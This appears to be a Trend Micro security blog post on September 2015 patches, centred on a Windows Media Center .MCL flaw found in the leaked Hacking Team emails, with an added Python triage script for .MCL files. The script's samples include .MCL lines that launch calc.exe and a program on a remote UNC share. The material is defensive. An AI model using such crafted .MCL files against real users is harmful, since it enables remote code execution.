Windows Media Center Hacking Team Bug Fixed in September 2015 Patch Tuesday
This month’s Patch Tuesday features 12 bulletins, five rated “critical” and seven “important.” The critical updates include the cumulative updates for Internet Explorer (MS15-094) and Microsoft Edge (MS15-095), which address bugs that could allow remote code execution if a user visits a specially crafted webpage with either browser.
Adobe has also released a security update (APSB15-22) for Adobe Shockwave Player. According to the bulletin, the updates “address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.”
Looking into CVE-2015-2509
One of this month’s updates (MS15-100) addresses a vulnerability in Windows Media Center (CVE-2015-2509). The vulnerability corresponds to a previously unreported zero-day exploit that Trend Micro researchers found in the leaked Hacking Team emails and subsequently reported to Microsoft.
According to the emails, the exploit worked reliably against the latest version of Windows Media Center at the time.
Figure 1. Leaked Hacking Team email
The screenshot of an email below gives more details. The crafted Windows Media Center file can be delivered in several ways, including email, websites, and instant messaging services. Once the user opens the file, no further interaction is required.
Figure 2. Details about the exploit
Windows Media Center link files use the .MCL extension and are plain text, so they are easy to create in Notepad. For example, we created a .MCL file containing instructions that launch the computer’s calculator.
Figure 3. Sample .MCL file
We reproduced the exploit and sent the related proof-of-concept (POC) file to Microsoft, which addressed the vulnerability in this month’s Patch Tuesday.
The leaked Hacking Team data has been publicly available for over a month now, and cybercriminals may use this exploit in future attacks. We recommend users avoid opening any files with the .MCL extension, especially those from unverified sources.
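As an added example (not part of the original post and not Trend Micro’s or Microsoft’s code), the following Python script parses .MCL content and reports what the file would make Media Center launch or load. It assumes Microsoft’s documented Media Center Link syntax: a single `<application .../>` element whose `run` attribute names a program to execute (optionally with `args`) and whose `url` attribute names web content. The sample files in the script are constructed for this example; the calc sample mirrors the Notepad-made test file described above, not the leaked exploit.

```python
"""Triage helper for Windows Media Center Link (.MCL) files.

Added example, not code from the original post. It assumes the MCL syntax
documented by Microsoft for Media Center Link files: a single
<application .../> element whose "run" attribute names a program to launch
("args" supplies its arguments) and whose "url" attribute names web content.
The sample files below are constructed for this example.
"""
import re

# Attribute-pair parser. Deliberately lenient (no strict XML parse) so that a
# slightly malformed file is still inspected instead of being silently skipped.
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)')")

UNC_RE = re.compile(r'^\\\\')                          # \\server\share\...
URL_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)   # scheme://...
EXEC_EXT_RE = re.compile(
    r'\.(exe|com|scr|pif|bat|cmd|vbs|vbe|js|jse|wsf|hta|ps1|msi|dll|lnk)$', re.I)


def parse_mcl(text):
    """Return {attribute_name: value} for every attribute found in the file."""
    attrs = {}
    for name, dq, sq in ATTR_RE.findall(text):
        attrs[name.lower()] = dq if dq else sq
    return attrs


def triage_mcl(text):
    """Return a list of findings describing anything the file would launch or load.

    An empty list means the file carries no launch-capable attribute.
    """
    findings = []
    attrs = parse_mcl(text)

    run = attrs.get("run", "").strip()
    if run:
        findings.append(f"run attribute launches: {run}")
        if UNC_RE.match(run):
            findings.append("run target is a UNC path (program fetched from another host)")
        if EXEC_EXT_RE.search(run):
            findings.append("run target has an executable extension")
        args = attrs.get("args", "").strip()
        if args:
            findings.append(f"args attribute passes arguments: {args}")

    url = attrs.get("url", "").strip()
    if url:
        findings.append(f"url attribute loads: {url}")
        if URL_RE.match(url) and not url.lower().startswith(("http://", "https://")):
            findings.append("url uses a non-HTTP scheme")

    return findings


def is_suspicious(text):
    """True if the .MCL file would make Media Center run or fetch anything."""
    return bool(triage_mcl(text))


# Constructed samples. SAMPLE_CALC mirrors the Notepad-made test file described
# in the post (Media Center is told to launch the calculator). SAMPLE_UNC is a
# constructed variant with a remote launch target, not the leaked exploit.
SAMPLE_CALC = '<application title="Holiday video" run="C:\\Windows\\System32\\calc.exe"/>'
SAMPLE_UNC = "<application title='Video' run='\\\\203.0.113.7\\share\\player.exe' args='/s'/>"
SAMPLE_BENIGN = '<application title="Local add-in" name="MyAddin"/>'

if __name__ == "__main__":
    for label, sample in (("calc", SAMPLE_CALC), ("unc", SAMPLE_UNC), ("benign", SAMPLE_BENIGN)):
        print(label, "SUSPICIOUS" if is_suspicious(sample) else "clean")
        for line in triage_mcl(sample):
            print("   -", line)
```

A check like this belongs on a mail gateway or in an incident-response triage script: it does not replace the patch, but it turns the “do not open .MCL files” advice into something that can be enforced, and it records exactly what a suspicious file was trying to run.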
Users are strongly advised to update their software and systems with these latest patches from Microsoft and Adobe. For additional information on these security bulletins, visit our Threat Encyclopedia page.
Trend Micro solutions
Trend Micro Deep Security and Vulnerability Protection protect user systems from threats that may leverage these vulnerabilities with the following DPI rules:
- 1007029 – Microsoft Windows Journal Remote Code Execution Vulnerability (CVE-2015-2513)
- 1007025 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2486)
- 1007024 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2485)
- 1007030 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2491)
- 1007026 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2487)
- 1007041 – Microsoft Internet Explorer Information Disclosure Vulnerability (CVE-2015-2483)
- 1007050 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2521)
- 1007051 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2523)
- 1007049 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2501)
- 1007039 – Microsoft Graphics Component Buffer Overflow Vulnerability (CVE-2015-2510)
- 1007043 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2492)
- 1007046 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2499)
- 1007044 – Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2015-2493)
- 1007048 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2500)
- 1007047 – Windows Media Center Remote Code Execution Vulnerability (CVE-2015-2509)
- 1007045 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2498)
- 1007028 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2490)
- 1007040 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2520)
- 1007052 – Microsoft Windows OpenType Font Parsing Vulnerability (CVE-2015-2506)
We disclosed CVE-2015-2509 to Microsoft on the following timeline:
- July 18 – We first sent the initial notification to Microsoft.
- August 8 – Microsoft acknowledged the vulnerability.
- September 8 – The security patch for this vulnerability was released.